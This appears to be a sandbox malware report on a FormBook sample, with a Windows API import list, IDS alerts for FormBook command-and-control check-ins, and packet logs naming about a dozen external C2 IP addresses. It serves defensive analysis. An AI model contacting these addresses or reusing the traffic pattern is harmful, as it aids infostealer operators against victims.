                                                                                                                          USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                                                          GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                                                          COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                                                          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                                                          OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                          EnglishGreat Britain
                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                          2025-01-10T16:41:48.012262+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549904154.213.39.6680TCP
                                                                                                                          2025-01-10T16:41:48.012262+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549904154.213.39.6680TCP
                                                                                                                          2025-01-10T16:42:03.773478+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54997746.38.243.23480TCP
                                                                                                                          2025-01-10T16:42:06.316926+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54997846.38.243.23480TCP
                                                                                                                          2025-01-10T16:42:08.872985+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54997946.38.243.23480TCP
                                                                                                                          2025-01-10T16:42:11.421639+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54998046.38.243.23480TCP
                                                                                                                          2025-01-10T16:42:11.421639+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54998046.38.243.23480TCP
                                                                                                                          2025-01-10T16:42:25.130232+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549981209.74.79.4280TCP
                                                                                                                          2025-01-10T16:42:27.942811+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549982209.74.79.4280TCP
                                                                                                                          2025-01-10T16:42:30.510802+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549983209.74.79.4280TCP
                                                                                                                          2025-01-10T16:42:33.077627+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549984209.74.79.4280TCP
                                                                                                                          2025-01-10T16:42:33.077627+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549984209.74.79.4280TCP
                                                                                                                          2025-01-10T16:42:38.768920+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54998547.254.140.25580TCP
                                                                                                                          2025-01-10T16:42:41.318777+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54998647.254.140.25580TCP
                                                                                                                          2025-01-10T16:42:43.936914+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54998747.254.140.25580TCP
                                                                                                                          2025-01-10T16:42:47.377173+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54998847.254.140.25580TCP
                                                                                                                          2025-01-10T16:42:47.377173+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54998847.254.140.25580TCP
                                                                                                                          2025-01-10T16:42:54.180791+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54998985.159.66.9380TCP
                                                                                                                          2025-01-10T16:42:56.724353+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54999085.159.66.9380TCP
                                                                                                                          2025-01-10T16:42:59.270659+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54999185.159.66.9380TCP
                                                                                                                          2025-01-10T16:43:01.013291+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54999285.159.66.9380TCP
                                                                                                                          2025-01-10T16:43:01.013291+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54999285.159.66.9380TCP
                                                                                                                          2025-01-10T16:43:06.731143+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549993188.114.97.380TCP
                                                                                                                          2025-01-10T16:43:09.258140+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549994188.114.97.380TCP
                                                                                                                          2025-01-10T16:43:11.874048+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549995188.114.97.380TCP
                                                                                                                          2025-01-10T16:43:14.364425+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549996188.114.97.380TCP
                                                                                                                          2025-01-10T16:43:14.364425+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549996188.114.97.380TCP
                                                                                                                          2025-01-10T16:43:28.215881+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549997199.59.243.22880TCP
                                                                                                                          2025-01-10T16:43:30.730742+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549998199.59.243.22880TCP
                                                                                                                          2025-01-10T16:43:33.321105+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549999199.59.243.22880TCP
                                                                                                                          2025-01-10T16:43:35.832142+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550000199.59.243.22880TCP
                                                                                                                          2025-01-10T16:43:35.832142+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550000199.59.243.22880TCP
                                                                                                                          2025-01-10T16:43:41.665841+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550001208.91.197.2780TCP
                                                                                                                          2025-01-10T16:43:44.195904+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550002208.91.197.2780TCP
                                                                                                                          2025-01-10T16:43:46.727809+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550003208.91.197.2780TCP
                                                                                                                          2025-01-10T16:43:49.757481+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550004208.91.197.2780TCP
                                                                                                                          2025-01-10T16:43:49.757481+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550004208.91.197.2780TCP
                                                                                                                          2025-01-10T16:43:55.714507+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550005136.243.64.14780TCP
                                                                                                                          2025-01-10T16:43:58.233396+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550006136.243.64.14780TCP
                                                                                                                          2025-01-10T16:44:00.768784+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550007136.243.64.14780TCP
                                                                                                                          2025-01-10T16:44:03.381007+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550008136.243.64.14780TCP
                                                                                                                          2025-01-10T16:44:03.381007+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550008136.243.64.14780TCP
                                                                                                                          2025-01-10T16:44:17.106873+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550009104.21.48.180TCP
                                                                                                                          2025-01-10T16:44:19.551968+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550010104.21.48.180TCP
                                                                                                                          2025-01-10T16:44:22.133759+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550011104.21.48.180TCP
                                                                                                                          2025-01-10T16:44:24.662228+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550012104.21.48.180TCP
                                                                                                                          2025-01-10T16:44:24.662228+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550012104.21.48.180TCP
                                                                                                                          2025-01-10T16:44:39.499291+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550013134.122.133.8080TCP
                                                                                                                          2025-01-10T16:44:42.073026+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550014134.122.133.8080TCP
                                                                                                                          2025-01-10T16:44:44.612294+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550015134.122.133.8080TCP
                                                                                                                          2025-01-10T16:44:47.149248+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550016134.122.133.8080TCP
                                                                                                                          2025-01-10T16:44:47.149248+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550016134.122.133.8080TCP
                                                                                                                          2025-01-10T16:44:52.908231+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55001793.127.192.20180TCP
                                                                                                                          2025-01-10T16:44:55.411921+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55001893.127.192.20180TCP
                                                                                                                          2025-01-10T16:44:57.944992+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55001993.127.192.20180TCP
                                                                                                                          2025-01-10T16:45:00.493092+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55002093.127.192.20180TCP
                                                                                                                          2025-01-10T16:45:00.493092+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55002093.127.192.20180TCP
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Jan 10, 2025 16:41:47.081957102 CET4990480192.168.2.5154.213.39.66
                                                                                                                          Jan 10, 2025 16:41:47.086894035 CET8049904154.213.39.66192.168.2.5
                                                                                                                          Jan 10, 2025 16:41:47.086973906 CET4990480192.168.2.5154.213.39.66
                                                                                                                          Jan 10, 2025 16:41:47.097542048 CET4990480192.168.2.5154.213.39.66
                                                                                                                          Jan 10, 2025 16:41:47.102402925 CET8049904154.213.39.66192.168.2.5
                                                                                                                          Jan 10, 2025 16:41:48.012099981 CET8049904154.213.39.66192.168.2.5
                                                                                                                          Jan 10, 2025 16:41:48.012119055 CET8049904154.213.39.66192.168.2.5
                                                                                                                          Jan 10, 2025 16:41:48.012262106 CET4990480192.168.2.5154.213.39.66
                                                                                                                          Jan 10, 2025 16:41:48.015549898 CET4990480192.168.2.5154.213.39.66
                                                                                                                          Jan 10, 2025 16:41:48.020492077 CET8049904154.213.39.66192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:03.127033949 CET4997780192.168.2.546.38.243.234
                                                                                                                          Jan 10, 2025 16:42:03.131923914 CET804997746.38.243.234192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:03.132035971 CET4997780192.168.2.546.38.243.234
                                                                                                                          Jan 10, 2025 16:42:03.144748926 CET4997780192.168.2.546.38.243.234
                                                                                                                          Jan 10, 2025 16:42:03.149652004 CET804997746.38.243.234192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:03.773226023 CET804997746.38.243.234192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:03.773242950 CET804997746.38.243.234192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:03.773478031 CET4997780192.168.2.546.38.243.234
                                                                                                                          Jan 10, 2025 16:42:04.645848036 CET4997780192.168.2.546.38.243.234
                                                                                                                          Jan 10, 2025 16:42:05.665154934 CET4997880192.168.2.546.38.243.234
                                                                                                                          Jan 10, 2025 16:42:05.670159101 CET804997846.38.243.234192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:05.670505047 CET4997880192.168.2.546.38.243.234
                                                                                                                          Jan 10, 2025 16:42:05.682810068 CET4997880192.168.2.546.38.243.234
                                                                                                                          Jan 10, 2025 16:42:05.687773943 CET804997846.38.243.234192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:06.316595078 CET804997846.38.243.234192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:06.316628933 CET804997846.38.243.234192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:06.316926003 CET4997880192.168.2.546.38.243.234
                                                                                                                          Jan 10, 2025 16:42:07.192631006 CET4997880192.168.2.546.38.243.234
                                                                                                                          Jan 10, 2025 16:42:08.212445974 CET4997980192.168.2.546.38.243.234
                                                                                                                          Jan 10, 2025 16:42:08.217433929 CET804997946.38.243.234192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:08.217544079 CET4997980192.168.2.546.38.243.234
                                                                                                                          Jan 10, 2025 16:42:08.238205910 CET4997980192.168.2.546.38.243.234
                                                                                                                          Jan 10, 2025 16:42:08.243135929 CET804997946.38.243.234192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:08.243247986 CET804997946.38.243.234192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:08.872823954 CET804997946.38.243.234192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:08.872900009 CET804997946.38.243.234192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:08.872984886 CET4997980192.168.2.546.38.243.234
                                                                                                                          Jan 10, 2025 16:42:09.755053043 CET4997980192.168.2.546.38.243.234
                                                                                                                          Jan 10, 2025 16:42:10.773255110 CET4998080192.168.2.546.38.243.234
                                                                                                                          Jan 10, 2025 16:42:10.778060913 CET804998046.38.243.234192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:10.780020952 CET4998080192.168.2.546.38.243.234
                                                                                                                          Jan 10, 2025 16:42:10.788733959 CET4998080192.168.2.546.38.243.234
                                                                                                                          Jan 10, 2025 16:42:10.793530941 CET804998046.38.243.234192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:11.421376944 CET804998046.38.243.234192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:11.421577930 CET804998046.38.243.234192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:11.421638966 CET4998080192.168.2.546.38.243.234
                                                                                                                          Jan 10, 2025 16:42:11.423842907 CET4998080192.168.2.546.38.243.234
                                                                                                                          Jan 10, 2025 16:42:11.428596020 CET804998046.38.243.234192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:24.532980919 CET4998180192.168.2.5209.74.79.42
                                                                                                                          Jan 10, 2025 16:42:24.537776947 CET8049981209.74.79.42192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:24.537879944 CET4998180192.168.2.5209.74.79.42
                                                                                                                          Jan 10, 2025 16:42:24.583030939 CET4998180192.168.2.5209.74.79.42
                                                                                                                          Jan 10, 2025 16:42:24.587938070 CET8049981209.74.79.42192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:25.130162001 CET8049981209.74.79.42192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:25.130181074 CET8049981209.74.79.42192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:25.130232096 CET4998180192.168.2.5209.74.79.42
                                                                                                                          Jan 10, 2025 16:42:26.098984957 CET4998180192.168.2.5209.74.79.42
                                                                                                                          Jan 10, 2025 16:42:27.357536077 CET4998280192.168.2.5209.74.79.42
                                                                                                                          Jan 10, 2025 16:42:27.362392902 CET8049982209.74.79.42192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:27.362483978 CET4998280192.168.2.5209.74.79.42
                                                                                                                          Jan 10, 2025 16:42:27.385236979 CET4998280192.168.2.5209.74.79.42
                                                                                                                          Jan 10, 2025 16:42:27.390028000 CET8049982209.74.79.42192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:27.942660093 CET8049982209.74.79.42192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:27.942708015 CET8049982209.74.79.42192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:27.942811012 CET4998280192.168.2.5209.74.79.42
                                                                                                                          Jan 10, 2025 16:42:28.895695925 CET4998280192.168.2.5209.74.79.42
                                                                                                                          Jan 10, 2025 16:42:29.914274931 CET4998380192.168.2.5209.74.79.42
                                                                                                                          Jan 10, 2025 16:42:29.920475960 CET8049983209.74.79.42192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:29.920572042 CET4998380192.168.2.5209.74.79.42
                                                                                                                          Jan 10, 2025 16:42:29.934814930 CET4998380192.168.2.5209.74.79.42
                                                                                                                          Jan 10, 2025 16:42:29.939678907 CET8049983209.74.79.42192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:29.939692020 CET8049983209.74.79.42192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:30.510641098 CET8049983209.74.79.42192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:30.510665894 CET8049983209.74.79.42192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:30.510802031 CET4998380192.168.2.5209.74.79.42
                                                                                                                          Jan 10, 2025 16:42:31.442569017 CET4998380192.168.2.5209.74.79.42
                                                                                                                          Jan 10, 2025 16:42:32.461029053 CET4998480192.168.2.5209.74.79.42
                                                                                                                          Jan 10, 2025 16:42:32.466012955 CET8049984209.74.79.42192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:32.466325045 CET4998480192.168.2.5209.74.79.42
                                                                                                                          Jan 10, 2025 16:42:32.474770069 CET4998480192.168.2.5209.74.79.42
                                                                                                                          Jan 10, 2025 16:42:32.479578972 CET8049984209.74.79.42192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:33.077318907 CET8049984209.74.79.42192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:33.077512026 CET8049984209.74.79.42192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:33.077626944 CET4998480192.168.2.5209.74.79.42
                                                                                                                          Jan 10, 2025 16:42:33.081124067 CET4998480192.168.2.5209.74.79.42
                                                                                                                          Jan 10, 2025 16:42:33.085948944 CET8049984209.74.79.42192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:38.107342958 CET4998580192.168.2.547.254.140.255
                                                                                                                          Jan 10, 2025 16:42:38.112154961 CET804998547.254.140.255192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:38.112229109 CET4998580192.168.2.547.254.140.255
                                                                                                                          Jan 10, 2025 16:42:38.126777887 CET4998580192.168.2.547.254.140.255
                                                                                                                          Jan 10, 2025 16:42:38.131525040 CET804998547.254.140.255192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:38.768768072 CET804998547.254.140.255192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:38.768816948 CET804998547.254.140.255192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:38.768856049 CET804998547.254.140.255192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:38.768919945 CET4998580192.168.2.547.254.140.255
                                                                                                                          Jan 10, 2025 16:42:38.768919945 CET4998580192.168.2.547.254.140.255
                                                                                                                          Jan 10, 2025 16:42:39.630250931 CET4998580192.168.2.547.254.140.255
                                                                                                                          Jan 10, 2025 16:42:40.650055885 CET4998680192.168.2.547.254.140.255
                                                                                                                          Jan 10, 2025 16:42:40.654983044 CET804998647.254.140.255192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:40.655056953 CET4998680192.168.2.547.254.140.255
                                                                                                                          Jan 10, 2025 16:42:40.675348997 CET4998680192.168.2.547.254.140.255
                                                                                                                          Jan 10, 2025 16:42:40.680135965 CET804998647.254.140.255192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:41.318680048 CET804998647.254.140.255192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:41.318716049 CET804998647.254.140.255192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:41.318739891 CET804998647.254.140.255192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:41.318777084 CET4998680192.168.2.547.254.140.255
                                                                                                                          Jan 10, 2025 16:42:41.318814039 CET4998680192.168.2.547.254.140.255
                                                                                                                          Jan 10, 2025 16:42:42.176894903 CET4998680192.168.2.547.254.140.255
                                                                                                                          Jan 10, 2025 16:42:43.197324038 CET4998780192.168.2.547.254.140.255
                                                                                                                          Jan 10, 2025 16:42:43.202272892 CET804998747.254.140.255192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:43.202369928 CET4998780192.168.2.547.254.140.255
                                                                                                                          Jan 10, 2025 16:42:43.222773075 CET4998780192.168.2.547.254.140.255
                                                                                                                          Jan 10, 2025 16:42:43.227638006 CET804998747.254.140.255192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:43.227962971 CET804998747.254.140.255192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:43.936732054 CET804998747.254.140.255192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:43.936772108 CET804998747.254.140.255192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:43.936870098 CET804998747.254.140.255192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:43.936913967 CET4998780192.168.2.547.254.140.255
                                                                                                                          Jan 10, 2025 16:42:43.944803953 CET4998780192.168.2.547.254.140.255
                                                                                                                          Jan 10, 2025 16:42:44.739484072 CET4998780192.168.2.547.254.140.255
                                                                                                                          Jan 10, 2025 16:42:45.759257078 CET4998880192.168.2.547.254.140.255
                                                                                                                          Jan 10, 2025 16:42:46.752437115 CET804998847.254.140.255192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:46.755186081 CET4998880192.168.2.547.254.140.255
                                                                                                                          Jan 10, 2025 16:42:46.764769077 CET4998880192.168.2.547.254.140.255
                                                                                                                          Jan 10, 2025 16:42:46.769624949 CET804998847.254.140.255192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:47.376975060 CET804998847.254.140.255192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:47.377021074 CET804998847.254.140.255192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:47.377060890 CET804998847.254.140.255192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:47.377172947 CET4998880192.168.2.547.254.140.255
                                                                                                                          Jan 10, 2025 16:42:47.380808115 CET4998880192.168.2.547.254.140.255
                                                                                                                          Jan 10, 2025 16:42:47.422610044 CET4998880192.168.2.547.254.140.255
                                                                                                                          Jan 10, 2025 16:42:47.427455902 CET804998847.254.140.255192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:52.641113043 CET4998980192.168.2.585.159.66.93
                                                                                                                          Jan 10, 2025 16:42:52.646030903 CET804998985.159.66.93192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:52.647751093 CET4998980192.168.2.585.159.66.93
                                                                                                                          Jan 10, 2025 16:42:52.662290096 CET4998980192.168.2.585.159.66.93
                                                                                                                          Jan 10, 2025 16:42:52.667041063 CET804998985.159.66.93192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:54.180790901 CET4998980192.168.2.585.159.66.93
                                                                                                                          Jan 10, 2025 16:42:54.185935974 CET804998985.159.66.93192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:54.192804098 CET4998980192.168.2.585.159.66.93
                                                                                                                          Jan 10, 2025 16:42:55.195890903 CET4999080192.168.2.585.159.66.93
                                                                                                                          Jan 10, 2025 16:42:55.200790882 CET804999085.159.66.93192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:55.200915098 CET4999080192.168.2.585.159.66.93
                                                                                                                          Jan 10, 2025 16:42:55.218323946 CET4999080192.168.2.585.159.66.93
                                                                                                                          Jan 10, 2025 16:42:55.223119020 CET804999085.159.66.93192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:56.724353075 CET4999080192.168.2.585.159.66.93
                                                                                                                          Jan 10, 2025 16:42:56.729505062 CET804999085.159.66.93192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:56.729631901 CET4999080192.168.2.585.159.66.93
                                                                                                                          Jan 10, 2025 16:42:57.743022919 CET4999180192.168.2.585.159.66.93
                                                                                                                          Jan 10, 2025 16:42:57.747920036 CET804999185.159.66.93192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:57.748048067 CET4999180192.168.2.585.159.66.93
                                                                                                                          Jan 10, 2025 16:42:57.765121937 CET4999180192.168.2.585.159.66.93
                                                                                                                          Jan 10, 2025 16:42:57.769985914 CET804999185.159.66.93192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:57.770087957 CET804999185.159.66.93192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:59.270658970 CET4999180192.168.2.585.159.66.93
                                                                                                                          Jan 10, 2025 16:42:59.276148081 CET804999185.159.66.93192.168.2.5
                                                                                                                          Jan 10, 2025 16:42:59.276201010 CET4999180192.168.2.585.159.66.93
                                                                                                                          Jan 10, 2025 16:43:00.289855003 CET4999280192.168.2.585.159.66.93
                                                                                                                          Jan 10, 2025 16:43:00.294984102 CET804999285.159.66.93192.168.2.5
                                                                                                                          Jan 10, 2025 16:43:00.295092106 CET4999280192.168.2.585.159.66.93
                                                                                                                          Jan 10, 2025 16:43:00.304539919 CET4999280192.168.2.585.159.66.93
                                                                                                                          Jan 10, 2025 16:43:00.309416056 CET804999285.159.66.93192.168.2.5
                                                                                                                          Jan 10, 2025 16:43:01.012867928 CET804999285.159.66.93192.168.2.5
                                                                                                                          Jan 10, 2025 16:43:01.012950897 CET804999285.159.66.93192.168.2.5
                                                                                                                          Jan 10, 2025 16:43:01.013290882 CET4999280192.168.2.585.159.66.93
